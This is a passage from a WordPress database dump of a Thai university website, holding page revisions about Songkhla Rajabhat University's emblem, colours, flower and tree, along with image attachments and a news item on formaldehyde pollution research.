colspan="2"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top">\r\n<table border="1" width="90%" cellspacing="0" cellpadding="0" align="center">\r\n<tbody>\r\n<tr>\r\n<td bgcolor="#FFFFFF"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td></td>\r\n<td class="font_history">สีขาว หมายถึง ความถูกต้อง ความบริสุทธิ์</td>\r\n</tr>\r\n<tr>\r\n<td valign="top"></td>\r\n<td colspan="2"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="13%">\r\n<table border="1" width="90%" cellspacing="0" cellpadding="0" align="center">\r\n<tbody>\r\n<tr>\r\n<td bgcolor="FF0000"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class="font_history"></td>\r\n<td class="font_history" width="87%">สีแดง หมายถึง ความรัก ความเข้มแข็ง</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border="0" width="90%" cellspacing="0" cellpadding="0" align="center">\r\n<tbody>\r\n<tr>\r\n<td class="font_history" height="30">\r\n<div align="left"><span style="font-family: Tahoma, MS Sans Serif, MS Dialog Light; font-size: small;"><strong>** สีขาว - สีแดง </strong></span>หมายความว่า นักศึกษาของมหาวิทยาลัยราชภัฏสงขลาทุกคนต้องกล้าคิด กล้าทำในสิ่งที่ถูกต้องดีงามด้วย ความบริสุทธ์ใจ **</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', '', '', 'inherit', 'closed', 'closed', '', '65-revision-v1', '', '', '2019-05-26 13:00:52', '2019-05-26 06:00:52', '', 65, 'http://172.17.40.11/wp511/?p=66', 0, 'revision', '', 0),
(67, 1, '2019-05-26 13:04:44', '2019-05-26 06:04:44', '', 'logoSKRU3', '', 'inherit', 'closed', 'closed', '', 'logoskru3', '', '', '2019-05-26 13:04:44', '2019-05-26 06:04:44', '', 65, 'http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU3.gif', 0, 'attachment', 'image/gif', 0),
(70, 1, '2019-05-26 13:09:11', '2019-05-26 06:09:11', '<span style="color: #0000ff;"><strong>ตราสัญลักษณ์ประจำมหาวิทยาลัยราชภัฎสงขลา</strong></span>\r\n\r\n<img class="size-full wp-image-67 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU3.gif" alt="" width="180" height="220" />\r\n\r\nเป็นรูปวงรีสองวงล้อมตราพระราชลัญจกรของพระบาทสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช ที่พระราชทานให้แก่มหาวิทยาลัยราชภัฏ ภายในวงรีด้านบนเป็นอักษรภาษาไทยเขียนว่า\r\n\r\n"มหาวิทยาลัยราชภัฏสงขลา" ด้านล่างเป็นอักษรภาษาอังกฤษเขียนว่า " SONGKHLA RAJABHAT UNIVERSITY"\r\n\r\nสีน้ำเงิน แทนค่า สถาบันพระมหากษัตริย์ผู้ให้กำเนิด และพระราชทานนามมหาวิทยาลัยราชภัฏ\r\n\r\nสีเขียว แทนค่า แหล่งที่ตั้งของมหาวิทยาลัยราชภัฏ ทั้ง 36 แห่ง ในแหล่งธรรมชาติและสิ่งแวดล้อมที่สวยงาม\r\n\r\nสีทอง แทนค่า ความเจริญรุ่งเรืองทางภูมิปัญญา\r\n\r\nสีส้ม แทนค่า ความเจริญรุ่งเรืองของศิลปวัฒนธรรมท้องถิ่นที่ก้าวไกลใน 36 สถาบัน\r\n\r\nสีขาว แทนค่า ความคิดอันบริสุทธิ์ของนักปราชญ์แห่งพระบาทสมเด็จพระเจ้าอยู่หัว\r\n\r\n<span style="color: #0000ff;"><strong>สีประจำมหาวิทยาลัย</strong></span>\r\n\r\nสีแดง-ขาว\r\n\r\n<img class="alignnone size-full wp-image-68" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/red.png" alt="" width="77" height="40" /> สีแดง หมายถึง ความรัก ความเข้มแข็ง\r\n\r\n<img class="alignnone size-full wp-image-69" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/white.png" alt="" width="77" height="40" /> สีขาว หมายถึง ความถูกต้อง ความบริสุทธ์\r\n\r\nดังนั้น สีแดง - สีขาว หมายถึง นักศึกษาของมหาวิทยาลัยราชภัฏสงขลาทุกคนต้องกล้าคิด กล้าทำในสิ่งที่ถูกต้องดีงามด้วยความบริสุทธ์ใจ', 'สัญลักษณ์ประจำมหาวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '65-revision-v1', '', '', '2019-05-26 13:09:11', '2019-05-26 06:09:11', '', 65, 'http://172.17.40.11/wp511/?p=70', 0, 'revision', '', 0),
(72, 1, '2019-05-26 13:11:29', '2019-05-26 06:11:29', '', 'red', '', 'inherit', 'closed', 'closed', '', 'red', '', '', '2019-05-26 13:11:29', '2019-05-26 06:11:29', '', 65, 'http://172.17.40.11/wp511/wp-content/uploads/2019/05/red.png', 0, 'attachment', 'image/png', 0),
(73, 1, '2019-05-26 13:11:35', '2019-05-26 06:11:35', '', 'white', '', 'inherit', 'closed', 'closed', '', 'white', '', '', '2019-05-26 13:11:35', '2019-05-26 06:11:35', '', 65, 'http://172.17.40.11/wp511/wp-content/uploads/2019/05/white.png', 0, 'attachment', 'image/png', 0),
(74, 1, '2019-05-26 13:11:48', '2019-05-26 06:11:48', '<span style="color: #0000ff;"><strong>ตราสัญลักษณ์ประจำมหาวิทยาลัยราชภัฎสงขลา</strong></span>\r\n\r\n<img class="size-full wp-image-67 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU3.gif" alt="" width="180" height="220" />\r\n\r\nเป็นรูปวงรีสองวงล้อมตราพระราชลัญจกรของพระบาทสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช ที่พระราชทานให้แก่มหาวิทยาลัยราชภัฏ ภายในวงรีด้านบนเป็นอักษรภาษาไทยเขียนว่า\r\n\r\n"มหาวิทยาลัยราชภัฏสงขลา" ด้านล่างเป็นอักษรภาษาอังกฤษเขียนว่า " SONGKHLA RAJABHAT UNIVERSITY"\r\n\r\nสีน้ำเงิน แทนค่า สถาบันพระมหากษัตริย์ผู้ให้กำเนิด และพระราชทานนามมหาวิทยาลัยราชภัฏ\r\n\r\nสีเขียว แทนค่า แหล่งที่ตั้งของมหาวิทยาลัยราชภัฏ ทั้ง 36 แห่ง ในแหล่งธรรมชาติและสิ่งแวดล้อมที่สวยงาม\r\n\r\nสีทอง แทนค่า ความเจริญรุ่งเรืองทางภูมิปัญญา\r\n\r\nสีส้ม แทนค่า ความเจริญรุ่งเรืองของศิลปวัฒนธรรมท้องถิ่นที่ก้าวไกลใน 36 สถาบัน\r\n\r\nสีขาว แทนค่า ความคิดอันบริสุทธิ์ของนักปราชญ์แห่งพระบาทสมเด็จพระเจ้าอยู่หัว\r\n\r\n<span style="color: #0000ff;"><strong>สีประจำมหาวิทยาลัย</strong></span>\r\n\r\nสีแดง-ขาว\r\n\r\n<img class="alignnone size-full wp-image-72" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/red.png" alt="" width="77" height="40" /> สีแดง หมายถึง ความรัก ความเข้มแข็ง\r\n\r\nสีขาว หมายถึง ความถูกต้อง ความบริสุทธ์\r\n\r\nดังนั้น สีแดง - สีขาว หมายถึง นักศึกษาของมหาวิทยาลัยราชภัฏสงขลาทุกคนต้องกล้าคิด กล้าทำในสิ่งที่ถูกต้องดีงามด้วยความบริสุทธ์ใจ', 'สัญลักษณ์ประจำมหาวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '65-revision-v1', '', '', '2019-05-26 13:11:48', '2019-05-26 06:11:48', '', 65, 'http://172.17.40.11/wp511/?p=74', 0, 'revision', '', 0),
(75, 1, '2019-05-26 13:12:05', '2019-05-26 06:12:05', '<span style="color: #0000ff;"><strong>ตราสัญลักษณ์ประจำมหาวิทยาลัยราชภัฎสงขลา</strong></span>\r\n\r\n<img class="size-full wp-image-67 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU3.gif" alt="" width="180" height="220" />\r\n\r\nเป็นรูปวงรีสองวงล้อมตราพระราชลัญจกรของพระบาทสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช ที่พระราชทานให้แก่มหาวิทยาลัยราชภัฏ ภายในวงรีด้านบนเป็นอักษรภาษาไทยเขียนว่า\r\n\r\n"มหาวิทยาลัยราชภัฏสงขลา" ด้านล่างเป็นอักษรภาษาอังกฤษเขียนว่า " SONGKHLA RAJABHAT UNIVERSITY"\r\n\r\nสีน้ำเงิน แทนค่า สถาบันพระมหากษัตริย์ผู้ให้กำเนิด และพระราชทานนามมหาวิทยาลัยราชภัฏ\r\n\r\nสีเขียว แทนค่า แหล่งที่ตั้งของมหาวิทยาลัยราชภัฏ ทั้ง 36 แห่ง ในแหล่งธรรมชาติและสิ่งแวดล้อมที่สวยงาม\r\n\r\nสีทอง แทนค่า ความเจริญรุ่งเรืองทางภูมิปัญญา\r\n\r\nสีส้ม แทนค่า ความเจริญรุ่งเรืองของศิลปวัฒนธรรมท้องถิ่นที่ก้าวไกลใน 36 สถาบัน\r\n\r\nสีขาว แทนค่า ความคิดอันบริสุทธิ์ของนักปราชญ์แห่งพระบาทสมเด็จพระเจ้าอยู่หัว\r\n\r\n<span style="color: #0000ff;"><strong>สีประจำมหาวิทยาลัย</strong></span>\r\n\r\nสีแดง-ขาว\r\n\r\n<img class="alignnone size-full wp-image-72" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/red.png" alt="" width="77" height="40" /> สีแดง หมายถึง ความรัก ความเข้มแข็ง\r\n\r\n<img class="alignnone size-full wp-image-73" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/white.png" alt="" width="77" height="40" />สีขาว หมายถึง ความถูกต้อง ความบริสุทธ์\r\n\r\nดังนั้น สีแดง - สีขาว หมายถึง นักศึกษาของมหาวิทยาลัยราชภัฏสงขลาทุกคนต้องกล้าคิด กล้าทำในสิ่งที่ถูกต้องดีงามด้วยความบริสุทธ์ใจ', 'สัญลักษณ์ประจำมหาวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '65-revision-v1', '', '', '2019-05-26 13:12:05', '2019-05-26 06:12:05', '', 65, 'http://172.17.40.11/wp511/?p=75', 0, 'revision', '', 0),
(76, 1, '2019-05-26 13:12:24', '2019-05-26 06:12:24', '<span style="color: #0000ff;"><strong>ตราสัญลักษณ์ประจำมหาวิทยาลัยราชภัฎสงขลา</strong></span>\r\n\r\n<img class="size-full wp-image-67 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU3.gif" alt="" width="180" height="220" />\r\n\r\nเป็นรูปวงรีสองวงล้อมตราพระราชลัญจกรของพระบาทสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช ที่พระราชทานให้แก่มหาวิทยาลัยราชภัฏ ภายในวงรีด้านบนเป็นอักษรภาษาไทยเขียนว่า\r\n\r\n"มหาวิทยาลัยราชภัฏสงขลา" ด้านล่างเป็นอักษรภาษาอังกฤษเขียนว่า " SONGKHLA RAJABHAT UNIVERSITY"\r\n\r\nสีน้ำเงิน แทนค่า สถาบันพระมหากษัตริย์ผู้ให้กำเนิด และพระราชทานนามมหาวิทยาลัยราชภัฏ\r\n\r\nสีเขียว แทนค่า แหล่งที่ตั้งของมหาวิทยาลัยราชภัฏ ทั้ง 36 แห่ง ในแหล่งธรรมชาติและสิ่งแวดล้อมที่สวยงาม\r\n\r\nสีทอง แทนค่า ความเจริญรุ่งเรืองทางภูมิปัญญา\r\n\r\nสีส้ม แทนค่า ความเจริญรุ่งเรืองของศิลปวัฒนธรรมท้องถิ่นที่ก้าวไกลใน 36 สถาบัน\r\n\r\nสีขาว แทนค่า ความคิดอันบริสุทธิ์ของนักปราชญ์แห่งพระบาทสมเด็จพระเจ้าอยู่หัว\r\n\r\n<span style="color: #0000ff;"><strong>สีประจำมหาวิทยาลัย</strong></span>\r\n\r\nสีแดง-ขาว\r\n\r\n<img class="alignnone size-full wp-image-72" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/red.png" alt="" width="77" height="40" /> สีแดง หมายถึง ความรัก ความเข้มแข็ง\r\n\r\n<img class="alignnone size-full wp-image-73" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/white.png" alt="" width="77" height="40" /> สีขาว หมายถึง ความถูกต้อง ความบริสุทธ์\r\n\r\nดังนั้น สีแดง - สีขาว หมายถึง นักศึกษาของมหาวิทยาลัยราชภัฏสงขลาทุกคนต้องกล้าคิด กล้าทำในสิ่งที่ถูกต้องดีงามด้วยความบริสุทธ์ใจ', 'สัญลักษณ์ประจำมหาวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '65-revision-v1', '', '', '2019-05-26 13:12:24', '2019-05-26 06:12:24', '', 65, 'http://172.17.40.11/wp511/?p=76', 0, 'revision', '', 0),
(77, 1, '2019-05-26 13:18:01', '2019-05-26 06:18:01', '', 'blue', '', 'inherit', 'closed', 'closed', '', 'blue', '', '', '2019-05-26 13:18:01', '2019-05-26 06:18:01', '', 65, 'http://172.17.40.11/wp511/wp-content/uploads/2019/05/blue.png', 0, 'attachment', 'image/png', 0),
(78, 1, '2019-05-26 13:18:02', '2019-05-26 06:18:02', '', 'gold', '', 'inherit', 'closed', 'closed', '', 'gold', '', '', '2019-05-26 13:18:02', '2019-05-26 06:18:02', '', 65, 'http://172.17.40.11/wp511/wp-content/uploads/2019/05/gold.png', 0, 'attachment', 'image/png', 0),
(79, 1, '2019-05-26 13:18:02', '2019-05-26 06:18:02', '', 'green', '', 'inherit', 'closed', 'closed', '', 'green', '', '', '2019-05-26 13:18:02', '2019-05-26 06:18:02', '', 65, 'http://172.17.40.11/wp511/wp-content/uploads/2019/05/green.png', 0, 'attachment', 'image/png', 0),
(80, 1, '2019-05-26 13:18:03', '2019-05-26 06:18:03', '', 'orange', '', 'inherit', 'closed', 'closed', '', 'orange', '', '', '2019-05-26 13:18:03', '2019-05-26 06:18:03', '', 65, 'http://172.17.40.11/wp511/wp-content/uploads/2019/05/orange.png', 0, 'attachment', 'image/png', 0),
(81, 1, '2019-05-26 13:18:46', '2019-05-26 06:18:46', '<span style="color: #0000ff;"><strong>ตราสัญลักษณ์ประจำมหาวิทยาลัยราชภัฎสงขลา</strong></span>\r\n\r\n<img class="size-full wp-image-67 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU3.gif" alt="" width="180" height="220" />\r\n\r\nเป็นรูปวงรีสองวงล้อมตราพระราชลัญจกรของพระบาทสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช ที่พระราชทานให้แก่มหาวิทยาลัยราชภัฏ ภายในวงรีด้านบนเป็นอักษรภาษาไทยเขียนว่า\r\n\r\n"มหาวิทยาลัยราชภัฏสงขลา" ด้านล่างเป็นอักษรภาษาอังกฤษเขียนว่า " SONGKHLA RAJABHAT UNIVERSITY"\r\n\r\n<img class="alignnone size-full wp-image-77" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/blue.png" alt="" width="77" height="40" /> สีน้ำเงิน แทนค่า สถาบันพระมหากษัตริย์ผู้ให้กำเนิด และพระราชทานนามมหาวิทยาลัยราชภัฏ\r\n\r\n<img class="alignnone size-full wp-image-79" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/green.png" alt="" width="77" height="40" /> สีเขียว แทนค่า แหล่งที่ตั้งของมหาวิทยาลัยราชภัฏ ทั้ง 36 แห่ง ในแหล่งธรรมชาติและสิ่งแวดล้อมที่สวยงาม\r\n\r\n<img class="alignnone size-full wp-image-78" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/gold.png" alt="" width="77" height="40" /> สีทอง แทนค่า ความเจริญรุ่งเรืองทางภูมิปัญญา\r\n\r\n<img class="alignnone size-full wp-image-80" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/orange.png" alt="" width="77" height="40" /> สีส้ม แทนค่า ความเจริญรุ่งเรืองของศิลปวัฒนธรรมท้องถิ่นที่ก้าวไกลใน 36 สถาบัน\r\n\r\n<img class="alignnone size-full wp-image-73" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/white.png" alt="" width="77" height="40" /> สีขาว แทนค่า ความคิดอันบริสุทธิ์ของนักปราชญ์แห่งพระบาทสมเด็จพระเจ้าอยู่หัว\r\n\r\n<span style="color: #0000ff;"><strong>สีประจำมหาวิทยาลัย</strong></span>\r\n\r\nสีแดง-ขาว\r\n\r\n<img class="alignnone size-full wp-image-72" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/red.png" alt="" width="77" height="40" /> สีแดง หมายถึง ความรัก ความเข้มแข็ง\r\n\r\n<img class="alignnone size-full wp-image-73" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/white.png" alt="" width="77" height="40" /> สีขาว หมายถึง ความถูกต้อง ความบริสุทธ์\r\n\r\nดังนั้น สีแดง - สีขาว หมายถึง นักศึกษาของมหาวิทยาลัยราชภัฏสงขลาทุกคนต้องกล้าคิด กล้าทำในสิ่งที่ถูกต้องดีงามด้วยความบริสุทธ์ใจ', 'สัญลักษณ์ประจำมหาวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '65-revision-v1', '', '', '2019-05-26 13:18:46', '2019-05-26 06:18:46', '', 65, 'http://172.17.40.11/wp511/?p=81', 0, 'revision', '', 0),
(82, 1, '2019-05-26 13:24:01', '2019-05-26 06:24:01', '<p style="text-align: center;"><span style="color: #0000ff;"><strong>ดอกไม้ประจำมหาวิทยาลัยราชภัฏสงขลา</strong></span></p>\r\n<img class="size-medium wp-image-83 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/fw01-300x195.jpg" alt="" width="300" height="195" />\r\n<p style="text-align: center;">ดอกปาริฉัตร</p>\r\n&nbsp;\r\n<p style="text-align: center;"><strong><span style="color: #0000ff;">ต้นไม้ประจำมหาวิทยาลัยราชภัฏสงขลา</span></strong></p>\r\n<img class="size-medium wp-image-84 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/salapee-225x300.jpg" alt="" width="225" height="300" />\r\n<p style="text-align: center;">ต้นสารภี</p>\r\nสารภี : ต้นไม้ประจำมหาวิทยาลัยราชภัฏสงขลา\r\n\r\nต้นไม้ชายฝั่งทะเล ที่ทรงคุณค่า มีลำต้นที่แข็งแกร่ง ทนทาน กลิ่นดอกที่หอมละมุน อ่อนหวาน ให้คุณประโยชน์ทั้งใช้ทำเป็นที่อยู่อาศัย\r\n\r\nและเป็นยา มหาวิทยาลัยราชภัฏสงขลา ซึ่งเป็นแหล่งที่พึ่งพิงหลักด้านวิทยาการท้องถิ่น จึงได้นำมาเป็นต้นไม้ประจำมหาวิทยาลัย', 'ดอกไม้และต้นไม้ประจำมหาวิทยาลัย', '', 'trash', 'closed', 'open', '', '%e0%b8%94%e0%b8%ad%e0%b8%81%e0%b9%84%e0%b8%a1%e0%b9%89%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%95%e0%b9%89%e0%b8%99%e0%b9%84%e0%b8%a1%e0%b9%89%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%88%e0%b8%b3%e0%b8%a1__trashed', '', '', '2019-05-27 09:10:22', '2019-05-27 02:10:22', '', 0, 'http://172.17.40.11/wp511/?p=82', 0, 'post', '', 0),
(83, 1, '2019-05-26 13:22:11', '2019-05-26 06:22:11', '', 'fw01', '', 'inherit', 'closed', 'closed', '', 'fw01', '', '', '2019-05-26 13:22:11', '2019-05-26 06:22:11', '', 82, 'http://172.17.40.11/wp511/wp-content/uploads/2019/05/fw01.jpg', 0, 'attachment', 'image/jpeg', 0),
(84, 1, '2019-05-26 13:22:57', '2019-05-26 06:22:57', '', 'salapee', '', 'inherit', 'closed', 'closed', '', 'salapee', '', '', '2019-05-26 13:22:57', '2019-05-26 06:22:57', '', 82, 'http://172.17.40.11/wp511/wp-content/uploads/2019/05/salapee.jpg', 0, 'attachment', 'image/jpeg', 0),
(85, 1, '2019-05-26 13:24:01', '2019-05-26 06:24:01', '<h1 style="text-align: center;"><strong>ดอกไม้และต้นไม้ประจำมหาวิทยาลัย</strong></h1>\r\n<p style="text-align: center;"><span style="color: #0000ff;"><strong>ดอกไม้ประจำมหาวิทยาลัยราชภัฏสงขลา</strong></span></p>\r\n<img class="size-medium wp-image-83 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/fw01-300x195.jpg" alt="" width="300" height="195" />\r\n<p style="text-align: center;">ดอกปาริฉัตร</p>\r\n<p style="text-align: center;"><strong><span style="color: #0000ff;">ต้นไม้ประจำมหาวิทยาลัยราชภัฏสงขลา</span></strong></p>\r\n<img class="size-medium wp-image-84 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/salapee-225x300.jpg" alt="" width="225" height="300" />\r\n<p style="text-align: center;">ต้นสารภี</p>\r\nสารภี : ต้นไม้ประจำมหาวิทยาลัยราชภัฏสงขลา\r\n\r\nต้นไม้ชายฝั่งทะเล ที่ทรงคุณค่า มีลำต้นที่แข็งแกร่ง ทนทาน กลิ่นดอกที่หอมละมุน อ่อนหวาน ให้คุณประโยชน์ทั้งใช้ทำเป็นที่อยู่อาศัย\r\n\r\nและเป็นยา มหาวิทยาลัยราชภัฏสงขลา ซึ่งเป็นแหล่งที่พึ่งพิงหลักด้านวิทยาการท้องถิ่น จึงได้นำมาเป็นต้นไม้ประจำมหาวิทยาลัย', 'ดอกไม้และต้นไม้ประจำมหาวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '82-revision-v1', '', '', '2019-05-26 13:24:01', '2019-05-26 06:24:01', '', 82, 'http://172.17.40.11/wp511/?p=85', 0, 'revision', '', 0),
(86, 1, '2019-05-26 13:29:56', '2019-05-26 06:29:56', '<strong>คณะวิทยาศาสตร์ฯ มรภ.สงขลา ผุดงานวิจัยแก้ปัญหาสิ่งแวดล้อมเน่า ใช้โมเดลคณิตศาสตร์และการประมวลผลโดยคอมพิวเตอร์ </strong>\r\n\r\n<strong>ลดมลภาวะจากการผลิตยูเรีย-ฟอร์มาลดีไฮด์เรซิน</strong>\r\n\r\n       ผศ.ดร.พลพัฒน์ รวมเจริญ ผู้ช่วยคณบดีฝ่ายวิเทศสัมพันธ์ คณะวิทยาศาสตร์และเทคโนโลยี มหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) เปิดเผยถึงงานวิจัยเพื่อแก้ไขปัญหาสิ่งแวดล้อมว่า ทั่วโลกกำลังประสบปัญหาสิ่งแวดล้อม เนื่องจากการขยายตัวของอุตสาหกรรม โดยเฉพาะฟอร์มาลดีไฮด์เป็นสารเคมีชนิดหนึ่งที่ก่อให้เกิดมลพิษกับสิ่งแวดล้อม ฟอร์มาลดีไฮด์เป็นก๊าซไม่มีสี มีกลิ่นฉุน ในปี ค.ศ.2004 องค์การอนามัยโลกได้ประกาศอย่างเป็นทางการว่าเป็นสารก่อมะเร็งในสัตว์ทดลอง และมีความเสี่ยงที่จะทำให้เกิดมะเร็งในมนุษย์ได้ แหล่งของฟอร์มาลดีไฮด์ที่สำคัญแหล่งหนึ่งคือยูเรียฟอร์มาลดีไฮด์เรซิน ซึ่งสารเคมีชนิดนี้ใช้เป็นสารตั้งต้นในการผลิตกาวไม้อัด ทั้งที่มีปัญหาสิ่งแวดล้อมดังที่ได้กล่าวมาแล้ว แต่ปัจจุบันมากกว่า 90 เปอร์เซ็นต์ของไม้อัดที่ใช้กันปัจจุบันทั่วโลกได้ใช้ยูเรียฟอร์มาลดีไฮด์เป็นกาว เนื่องจากมีต้นทุนการผลิตต่ำ และให้สมบัติที่ดีในแง่ของความแข็งแรง จึงเป็นเหตุทำให้มีรายงานวิจัยในหลายๆ ปีที่ผ่านมา ว่ามลพิษทางอากาศจากการแพร่ของฟอร์มาลดีไฮด์ (formaldehyde emission) ที่เกิดขึ้นทั้งในบ้านและสำนักงาน มาจากการใช้วัสดุก่อสร้างเฟอร์นิเจอร์ที่มีกาวยูเรียฟอร์มาลดีไฮด์เป็นองค์ประกอบ\r\n\r\nจากปัญหาดังกล่าว ทำให้ประเทศในยุโรปมีการกำหนดมาตรฐานควบคุมปริมาณฟอร์มาลดีไฮด์ตกค้างอยู่ในผลิตภัณฑ์ไม้อัดและเฟอร์นิเจอร์ และขณะนี้ประเทศสหรัฐอเมริกาได้ออกมาตรการควบคุมมลพิษที่ลอยในอากาศ เพื่อลดการแพร่กระจายของฟอร์มาลดีไฮด์ จากผลิตภัณฑ์ที่มีส่วนประกอบของไม้ นอกจากอุตสาหกรรมกาวไม้อัดแล้ว ยังมีอุตสาหกรรมอื่นๆ ที่เกี่ยวข้องกับยูเรียฟอร์มาลดีไฮด์ คืออุตสาหกรรมการตกแต่งสิ่งทอ (textile finishing) และอุตสาหกรรมเคลือบผิววัสดุ (surface coating) ซึ่งได้เกิดปัญหาในทำนองเดียวกัน และมักปลดปล่อยฟอร์มาลดีไฮด์ในระหว่างกระบวนการสังเคราะห์เรซินชนิดนี้ ตนและทีมวิจัยจึงได้คิดค้นงานวิจัยเพื่อลดมลภาวะในสิ่งแวดล้อม โดยใช้การสร้างโมเดลจลนพลศาสตร์ของปฏิกิริยาการเกิดยูเรียฟอร์มาลดีไฮด์เรซิน ในขั้นตอนการสังเคราะห์ยูเรียฟอร์มาลดีไฮด์\r\n\r\nโมเดลจลนพลศาสตร์นั้น สร้างขึ้นโดยอาศัยข้อมูลจากกลไกปฏิกิริยาการเกิดยูเรียฟอร์มาลดีไฮด์ จากนั้นเป็นการสร้างโมเดลจลนพลศาสตร์จากกลไกปฏิกิริยาและอาศัยเทคนิคการจำลองสถานการณ์ด้วยคอมพิวเตอร์ เพื่อใช้ทำนายปริมาณของฟอร์มาลดีไฮด์ระหว่างการเกิดปฏิกิริยา ปรากฏว่า ผลการคำนวณปริมาณฟอร์มาลดีไฮด์ที่เปลี่ยนแปลง กับเวลาที่เกิดปฏิกิริยาจากการจำลองด้วยคอมพิวเตอร์ สอดคล้องกับผลการทดลองจริง จากนั้นนำโมเดลที่ได้จากการสร้างกราฟความสัมพันธ์ระหว่างตัวแปรต่างๆ ที่มีผลต่อปฏิกิริยา ได้แก่ ปริมาณสัดส่วน อุณหภูมิและ ความเป็นกรด-เบส ต่อปริมาณฟอร์มาลดีไฮด์ที่ตกค้างในพรีพอลิเมอร์แต่ละสภาวะ รวมทั้งระยะเวลาที่เข้าสู่สมดุล โมเดลจลนพลศาสตร์ดังกล่าวยังสามารถใช้ทำนายว่าภายใต้สภาวะสัดส่วนของสารตั้งต้นและอุณหภูมิที่กำหนด จะมีฟอร์มาลดีไฮด์ตกค้างอยู่เท่าใด และช่วยทำนายแนวโน้มการเปลี่ยนแปลงปริมาณหมู่ทำหน้าที่ของสารตั้งต้นและผลิตภัณฑ์ระหว่างการทดลอง ซึ่งช่วยทำให้ผู้ผลิตเลือกสภาวะที่เหมาะสมในการผลิตให้ได้ผลิตภัณฑ์ตามต้องการ และวางแผนเพื่อลดมลพิษอันเกิดจากฟอร์มาลดีไฮด์ที่หลงเหลืออยู่จากการผลิตได้อย่างถูกต้อง งานวิจัยนี้ได้รับทุนสนับสนุนการวิจัยจากงบประมาณแผ่นดิน ผ่านสำนักงานคณะกรรมการวิจัยแห่งชาติ (วช.) และได้นำเสนอในที่ประชุมวิชาการระดับนานาชาติ (International Conference of Key Engineering Materials 2013) ณ ประเทศมาเลเซีย\r\n\r\n\r\n\r\n<strong>ภาพและข่าว โดย/ ลัดดา เอ้งเถี้ยว</strong>\r\n<strong>นักประชาสัมพันธ์ มรภ.สงขลา</strong>\r\n\r\nวันที่  11 ธันวาคม 2556', 'นักวิจัย มรภ.สงขลา ใช้โมเดลคณิตลดมลภาวะยูเรีย', '', 'trash', 'closed', 'open', '', '%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%88%e0%b8%b1%e0%b8%a2-%e0%b8%a1%e0%b8%a3%e0%b8%a0-%e0%b8%aa%e0%b8%87%e0%b8%82%e0%b8%a5%e0%b8%b2-%e0%b9%83%e0%b8%8a%e0%b9%89%e0%b9%82__trashed', '', '', '2019-05-27 09:30:03', '2019-05-27 02:30:03', '', 0, 'http://172.17.40.11/wp511/?p=86', 0, 'post', '', 0),
(87, 1, '2019-05-26 13:29:56', '2019-05-26 06:29:56', '<strong>คณะวิทยาศาสตร์ฯ มรภ.สงขลา ผุดงานวิจัยแก้ปัญหาสิ่งแวดล้อมเน่า ใช้โมเดลคณิตศาสตร์และการประมวลผลโดยคอมพิวเตอร์ </strong>\r\n\r\n<strong>ลดมลภาวะจากการผลิตยูเรีย-ฟอร์มาลดีไฮด์เรซิน</strong>\r\n\r\n<img src="http://arit.skru.ac.th/si/images/stories/32.jpg" alt="" width="500" height="334" /><img src="http://arit.skru.ac.th/si/images/stories/23-1(5).jpg" alt="" width="200" height="210" align="right" />       ผศ.ดร.พลพัฒน์ รวมเจริญ ผู้ช่วยคณบดีฝ่ายวิเทศสัมพันธ์ คณะวิทยาศาสตร์และเทคโนโลยี มหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) เปิดเผยถึงงานวิจัยเพื่อแก้ไขปัญหาสิ่งแวดล้อมว่า ทั่วโลกกำลังประสบปัญหาสิ่งแวดล้อม เนื่องจากการขยายตัวของอุตสาหกรรม โดยเฉพาะฟอร์มาลดีไฮด์เป็นสารเคมีชนิดหนึ่งที่ก่อให้เกิดมลพิษกับสิ่งแวดล้อม ฟอร์มาลดีไฮด์เป็นก๊าซไม่มีสี มีกลิ่นฉุน ในปี ค.ศ.2004 